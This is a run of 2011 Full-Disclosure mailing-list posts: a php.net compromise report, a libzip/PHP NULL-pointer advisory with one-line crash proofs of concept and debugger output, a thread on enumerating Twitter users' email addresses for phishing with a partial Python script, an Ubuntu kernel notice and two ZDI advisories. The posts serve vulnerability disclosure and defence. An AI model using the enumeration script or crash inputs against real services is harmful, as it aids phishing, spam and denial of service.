sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] php.net compromised and php source backdoored
Happened 3 months ago; http://bjori.blogspot.com/2010/12/php-project-and-code-review.html One could theorize that same user used same password for the wiki and had file upload permissions. Worrying that PHP.net didn't do a review everything that account could access. On Fri, Mar 18, 2011 at 10:27 AM, sec yun r...@wooyun.org wrote: Hi Someone report a security incident about php.net http://www.wooyun.org/bugs/wooyun-2010-01635 The picture show that some php.net site was compromised,and hacker backdoored php source :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5) ] Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - - Dis.: 03.01.2011 - - Pub.: 18.03.2011 CVE: CVE-2011-0421 CERT: VU#325039 Affected Software: - - libzip 0.9.3 - - PHP 5.3.5 (fixed 5.3.6) Original URL: http://securityreason.com/achievement_securityalert/96 - --- 0.Description --- libzip is a C library for reading, creating, and modifying zip archives. Files can be added from data buffers, files, or compressed data copied directly from other zip archives. Changes made without closing the archive can be reverted. The API is documented by man pages. - --- 1.Description --- libzip allows remote and local attackers to Denial of Service (Null Pointer Dereference) if ZIP_FL_UNCHANGED flag is set. - -lib/zip_name_locate.c--- int _zip_name_locate(struct zip *za, const char *fname, int flags, struct zip_error *error) { int (*cmp)(const char *, const char *); const char *fn, *p; int i, n; if (fname == NULL) { _zip_error_set(error, ZIP_ER_INVAL, 0); return -1; } cmp = (flags ZIP_FL_NOCASE) ? strcasecmp : strcmp; n = (flags ZIP_FL_UNCHANGED) ? za-cdir-nentry : za-nentry; = CRASH HERE - -lib/zip_name_locate.c--- for empty zip file and ZIP_FL_UNCHANGED flag, libzip should crash. Currently for PHP, the security impact we estimate only like a remote DoS, so risk is low. Project using libzip: KDE Utilities (4.x branch), MySQL Workbench, ckmame, fuse-zip, php zip extension, Endeavour2, FreeDink Better analysis based on PHP code ZipArchive, bellow - --- 2. PHP 5.3.5 ZipArchive() --- PoC1: php -r '$nx=new ZipArchive();$nx-open(/dev/null);$nx-locateName(a,ZIPARCHIVE::FL_UNCHANGED);' PoC2: php -r '$nx=new ZipArchive();$nx-open(empty.zip);$nx-statName(a,ZIPARCHIVE::FL_UNCHANGED);' Let's - -php_zip.c- ... static ZIPARCHIVE_METHOD(locateName) { ... ZIP_FROM_OBJECT(intern, this); if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, s|l, name, name_len, flags) == FAILURE) { return; } ... idx = (long)zip_name_locate(intern, (const char *)name, flags); === CRASH IN THIS FUNCTION ... - -php_zip.c- and let`s see - -zip_name_locate.c- ZIP_EXTERN(int) zip_name_locate(struct zip *za, const char *fname, int flags) { return _zip_name_locate(za, fname, flags, za-error); } int _zip_name_locate(struct zip *za, const char *fname, int flags, struct zip_error *error) { int (*cmp)(const char *, const char *); const char *fn, *p; int i, n; if (fname == NULL) { _zip_error_set(error, ZIP_ER_INVAL, 0); return -1; } cmp = (flags ZIP_FL_NOCASE) ? strcmpi : strcmp; n = (flags ZIP_FL_UNCHANGED) ? za-cdir-nentry : za-nentry; === CRASH HERE IF ZIPARCHIVE::FL_UNCHANGED for (i=0; in; i++) { ... - -zip_name_locate.c- (gdb) bt #0 0x006407cc in _zip_name_locate (za=0x118d520, fname=0x116ac70 a, flags=32767, error=0x) at /build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65 #1 0x006381e6 in c_ziparchive_locateName (ht=2, return_value=0x1169418, return_value_ptr=0x, this_ptr=0x118d530, return_value_used=-176126592) at /build/buildd/php5-5.3.3/ext/zip/php_zip.c:1877 #2 0x006e986a in zend_do_fcall_common_helper_SPEC (execute_data=0x77eb7068) at /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316 #3 0x006c0b00 in execute (op_array=0x1168568) at /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:107 ... Program received signal SIGSEGV, Segmentation fault. 0x006407cc in _zip_name_locate (za=0x118d520, fname=0x1169400 9223372036854775808, flags=32767, error=0x) at /build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65 65 n = (flags ZIP_FL_UNCHANGED) ? za-cdir-nentry : za-nentry; (gdb) print za-cdir-nentry Cannot access memory at address 0x8 (gdb) print za-nentry $21 = 0 because (gdb) x/i $rip = 0x6407cc _zip_name_locate+236: mov0x8(%rax),%eax (gdb) x/i $rax 0x0: Cannot access memory at address 0x0 (gdb) x/i $eax call to zip_name_locate (gdb) n 1877idx = (long)zip_name_locate(intern, (const char *)name, flags); (gdb) print intern $24 = (struct zip *) 0x118d580 (gdb) x/x intern 0x118d580: 0x0118d220 (gdb) x/40x intern 0x118d580: 0x0118d220 0x 0x0118d340 0x 0x118d590: 0x 0x 0x 0x 0x118d5a0: 0x 0x 0x 0x 0x118d5b0: 0x 0x 0x 0x 0x118d5c0: 0x 0x 0x 0x 0x118d5d0:
Re: [Full-disclosure] php.net compromised and php source backdoored
They've been targeting apache, php, sourceforge, and all popular opensource ware sites. On Fri, Mar 18, 2011 at 10:03 PM, Benji m...@b3nji.com wrote: Happened 3 months ago; http://bjori.blogspot.com/2010/12/php-project-and-code-review.html One could theorize that same user used same password for the wiki and had file upload permissions. Worrying that PHP.net didn't do a review everything that account could access. On Fri, Mar 18, 2011 at 10:27 AM, sec yun r...@wooyun.org wrote: Hi Someone report a security incident about php.net http://www.wooyun.org/bugs/wooyun-2010-01635 The picture show that some php.net site was compromised,and hacker backdoored php source :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Using Twitter for Phishing Campaign / Spam / Followers?
with services like decaptcher and deathbycaptcha this would not be a hindrance anyway 2011/3/15 Cal Leeming c...@foxwhisper.co.uk Agreed. These public API methods should have brute force protection at the very least. But, because they want instant in-line form validation for email address availability, this makes it difficult. In an ideal world, they'd have a CAPTCHA on the form, and only validate upon submit with valid captcha. On Tue, Mar 15, 2011 at 3:02 PM, Reverse Skills cont...@reverseskills.com wrote: The problem is to allow unlimited access to that resource, not the resource itself. 2011/3/15 Cal Leeming c...@foxwhisper.co.uk: This conceptual flaw exists in most web apps which have a reset password by email address feature, as most will display an error if the email address does not exist in their database. On Tue, Mar 15, 2011 at 12:19 PM, Reverse Skills cont...@reverseskills.com wrote: Simple and easy way to get a list of email accounts used on Twitter. For Phishing campaigns, custom Spam... Twitter has been notified and I suppose someday be fixed if they think there should be filtered. When you create a new Twitter account, the form requesting a mailing address. Twitter verify that the email account is not being used, but does not check any user token or limit the usage (captcha/block). https://twitter.com/signup - http://twitter.com/users/email_available?email= We just need to automate it with a simple script , ***Everything you do will be your responsibility*** --- #!/usr/bin/python import sys, json, urllib2, os f = urllib2.urlopen(http://twitter.com/users/email_available?email= +sys.argv[1]) data = json.load(f) def valid() .. Email has already been taken in data [msg] -- reply .. --- We just need a list of users to test.. for example : http://twitter.com/about/employees (don't be evil is just an example!) Parsing the name/nickname and testing the {user}@twitter.com a few minutes later we have a list of ~ 400 valid internal email *@twitter.com. An attacker could probably.. a brute force attack (Google Apps), would send Phishing or try to exploit some browser bugs or similar. #Aurora #Google. Most of these e-mail are internal, not public.. There are also some that make you think they are used to such A-Directory system users : .. apa...@twitter.com r...@twitter.com m...@twitter.com .. But, if you download a database Rockyou / Singles.org / Gawker / Rootkit.com or just a typical dictionaries and domains will be quite easy to get hold of a list of users large enough (*@hotmail.com, *@gmail.com, etc).For example in my case I used to find user accounts in a pentest of a company that used Twitter. But probably not a good idea to allow unlimited access, a malicious user could use these user lists for Spam or Phishing. -- Security Researcher http://twitter.com/revskills -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Security Researcher http://twitter.com/revskills -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Using Twitter for Phishing Campaign / Spam / Followers?
Lol, I didn't know about the commercial product 'decaptcher'. For shits and giggles, I was going to write a decaptcha myself and release as open source, never had time though :S One option would be to apply rate limitations to API calls per IP. Or, possibly some realy heavily obfuscated JS which does key calculation with a matching server side algo, and injects the value into the form upon submission. This is one of the methods we use on our paid adult sites. Unless the person is really determined (and has the patience to deobfuscate, then port to their own code), or their bots have spidermonkey built in, then it usually fends off most botters. To make it harder, we also have a library of about 500 of these (each with a different key build algo), which are cycled automatically lol. Example: $(function() { var _0xafd3=[\x74\x20\x3D\x20\x22,,\x6A\x6F\x69\x6E,\x72\x65\x76\x65\x72\x73\x65,\x73\x70\x6C\x69\x74,\x72\x65\x70\x6C\x61\x63\x65,\x22];eval(_0xafd3[0]+s[_0xafd3[5]](/ZPAK/gi,_0xafd3[1])[_0xafd3[5]](/\,\/gi,_0xafd3[1])[_0xafd3[5]](/\/gi,_0xafd3[1])[_0xafd3[4]](_0xafd3[1])[_0xafd3[3]]()[_0xafd3[2]](_0xafd3[1])+_0xafd3[6]); var _0x5bfa=[\x3C\x69\x6E\x70\x75\x74\x20\x2F\x3E,\x74\x79\x70\x65,\x68\x69\x64\x64\x65\x6E,\x61\x74\x74\x72,\x6E\x61\x6D\x65,\x73\x65\x65\x64\x6B\x65\x79,\x76\x61\x6C\x75\x65,\x61\x70\x70\x65\x6E\x64,\x23\x74\x68\x65\x66\x6F\x72\x6D];_n=$(_0x5bfa[0]);_n[_0x5bfa[3]](_0x5bfa[1],_0x5bfa[2]);_n[_0x5bfa[3]](_0x5bfa[4],_0x5bfa[5]);_n[_0x5bfa[3]](_0x5bfa[6],t);$(_0x5bfa[8])[_0x5bfa[7]](_n); }); Again, not perfect, but it's worked well for us :) On Fri, Mar 18, 2011 at 3:58 PM, huj huj huj datski...@gmail.com wrote: with services like decaptcher and deathbycaptcha this would not be a hindrance anyway 2011/3/15 Cal Leeming c...@foxwhisper.co.uk Agreed. These public API methods should have brute force protection at the very least. But, because they want instant in-line form validation for email address availability, this makes it difficult. In an ideal world, they'd have a CAPTCHA on the form, and only validate upon submit with valid captcha. On Tue, Mar 15, 2011 at 3:02 PM, Reverse Skills cont...@reverseskills.com wrote: The problem is to allow unlimited access to that resource, not the resource itself. 2011/3/15 Cal Leeming c...@foxwhisper.co.uk: This conceptual flaw exists in most web apps which have a reset password by email address feature, as most will display an error if the email address does not exist in their database. On Tue, Mar 15, 2011 at 12:19 PM, Reverse Skills cont...@reverseskills.com wrote: Simple and easy way to get a list of email accounts used on Twitter. For Phishing campaigns, custom Spam... Twitter has been notified and I suppose someday be fixed if they think there should be filtered. When you create a new Twitter account, the form requesting a mailing address. Twitter verify that the email account is not being used, but does not check any user token or limit the usage (captcha/block). https://twitter.com/signup - http://twitter.com/users/email_available?email= We just need to automate it with a simple script , ***Everything you do will be your responsibility*** --- #!/usr/bin/python import sys, json, urllib2, os f = urllib2.urlopen(http://twitter.com/users/email_available?email= +sys.argv[1]) data = json.load(f) def valid() .. Email has already been taken in data [msg] -- reply .. --- We just need a list of users to test.. for example : http://twitter.com/about/employees (don't be evil is just an example!) Parsing the name/nickname and testing the {user}@twitter.com a few minutes later we have a list of ~ 400 valid internal email *@twitter.com. An attacker could probably.. a brute force attack (Google Apps), would send Phishing or try to exploit some browser bugs or similar. #Aurora #Google. Most of these e-mail are internal, not public.. There are also some that make you think they are used to such A-Directory system users : .. apa...@twitter.com r...@twitter.com m...@twitter.com .. But, if you download a database Rockyou / Singles.org / Gawker / Rootkit.com or just a typical dictionaries and domains will be quite easy to get hold of a list of users large enough (*@hotmail.com, *@gmail.com, etc).For example in my case I used to find user accounts in a pentest of a company that used Twitter. But probably not a good idea to allow unlimited access, a malicious user could use these user lists for Spam or Phishing. -- Security Researcher http://twitter.com/revskills -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Security Researcher http://twitter.com/revskills --
[Full-disclosure] [USN-1089-1] Linux kernel vulnerabilities
=== Ubuntu Security Notice USN-1089-1March 18, 2011 linux, linux-ec2 vulnerabilities CVE-2010-4076, CVE-2010-4077, CVE-2010-4158, CVE-2010-4162, CVE-2010-4163, CVE-2010-4175, CVE-2010-4242 === A security issue affects the following Ubuntu releases: Ubuntu 9.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.10: linux-image-2.6.31-23-386 2.6.31-23.74 linux-image-2.6.31-23-generic 2.6.31-23.74 linux-image-2.6.31-23-generic-pae 2.6.31-23.74 linux-image-2.6.31-23-ia64 2.6.31-23.74 linux-image-2.6.31-23-lpia 2.6.31-23.74 linux-image-2.6.31-23-powerpc 2.6.31-23.74 linux-image-2.6.31-23-powerpc-smp 2.6.31-23.74 linux-image-2.6.31-23-powerpc64-smp 2.6.31-23.74 linux-image-2.6.31-23-server2.6.31-23.74 linux-image-2.6.31-23-sparc64 2.6.31-23.74 linux-image-2.6.31-23-sparc64-smp 2.6.31-23.74 linux-image-2.6.31-23-virtual 2.6.31-23.74 linux-image-2.6.31-308-ec2 2.6.31-308.28 After a standard system update you need to reboot your computer to make all the necessary changes. ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. If you use linux-restricted-modules, you have to update that package as well to get modules which work with the new kernel version. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well. Details follow: Dan Rosenberg discovered that multiple terminal ioctls did not correctly initialize structure memory. A local attacker could exploit this to read portions of kernel stack memory, leading to a loss of privacy. (CVE-2010-4076, CVE-2010-4077) Dan Rosenberg discovered that the socket filters did not correctly initialize structure memory. A local attacker could create malicious filters to read portions of kernel stack memory, leading to a loss of privacy. (CVE-2010-4158) Dan Rosenberg discovered that certain iovec operations did not calculate page counts correctly. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2010-4162) Dan Rosenberg discovered that the SCSI subsystem did not correctly validate iov segments. A local attacker with access to a SCSI device could send specially crafted requests to crash the system, leading to a denial of service. (CVE-2010-4163) Dan Rosenberg discovered that the RDS protocol did not correctly check ioctl arguments. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2010-4175) Alan Cox discovered that the HCI UART driver did not correctly check if a write operation was available. If the mmap_min-addr sysctl was changed from the Ubuntu default to a value of 0, a local attacker could exploit this flaw to gain root privileges. (CVE-2010-4242) Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-308.28.diff.gz Size/MD5: 9326032 7f382bfad2a3ecf8d36081183a050135 http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-308.28.dsc Size/MD5: 3308 be1ed679e9f21ef057b4f91b83a97381 http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31.orig.tar.gz Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-23.74.diff.gz Size/MD5: 3016564 a1166cc78c81dfda98407d84f35c1046 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-23.74.dsc Size/MD5: 4384 165930ab54ad22d74e762df2b2807a6e http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-308.28_all.deb Size/MD5: 3804752 d819b3de234bba044bdcff3040e41172 http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-308.28_all.deb Size/MD5: 64298296 e636a826b9b3de3399fb27fddceb7fea http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-308_2.6.31-308.28_all.deb Size/MD5: 9676950 179c86615b729e8fb1f7b4edf549408b http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-23.74_all.deb Size/MD5: 3805952 091412cbbdd90be5104304de7572fad3 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-23_2.6.31-23.74_all.deb Size/MD5: 9546696 3059163b85fec09f79a971dc5b4473c5
[Full-disclosure] ZDI-11-105: Hewlett-Packard Client Automation radexecd.exe Remote Code Execution Vulnerability
ZDI-11-105: Hewlett-Packard Client Automation radexecd.exe Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-105 March 18, 2011 -- CVE ID: CVE-2011-0889 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Hewlett-Packard -- Affected Products: Hewlett-Packard Client Automation -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10841. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Client Automation. Authentication is not required to exploit this vulnerability. The flaw exists within the radexecd.exe component which listens by default on TCP port 3465. When handling a remote execute request the process does not properly authenticate the user issuing the request. Utilities are stored in the 'secure' path which enable an attacker to re-execute an arbitrary executable. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the SYSTEM user. -- Vendor Response: Hewlett-Packard has issued an update to correct this vulnerability. More details can be found at: http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02750690 -- Disclosure Timeline: 2010-09-23 - Vulnerability reported to vendor 2011-03-18 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-11-106: Novell Netware NWFTPD.NLM DELE Remote Code Execution Vulnerability
ZDI-11-106: Novell Netware NWFTPD.NLM DELE Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-106 March 18, 2011 -- CVE ID: CVE-2010-4228 -- CVSS: 9, (AV:N/AC:L/Au:S/C:C/I:C/A:C) -- Affected Vendors: Novell -- Affected Products: Novell Netware -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10659. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell Netware. Authentication is required to exploit this vulnerability. The flaw exists within NWFTPD.NLM. When handling the argument provided to the DELE command the application copies user supplied data to a fixed length stack buffer. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the super user. -- Vendor Response: Novell has issued an update to correct this vulnerability. More details can be found at: http://download.novell.com/Download?buildid=Ax6AbxwGLTs~ -- Disclosure Timeline: 2010-09-22 - Vulnerability reported to vendor 2011-03-18 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Francis Provencher for Protek Research Lab#39;s -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/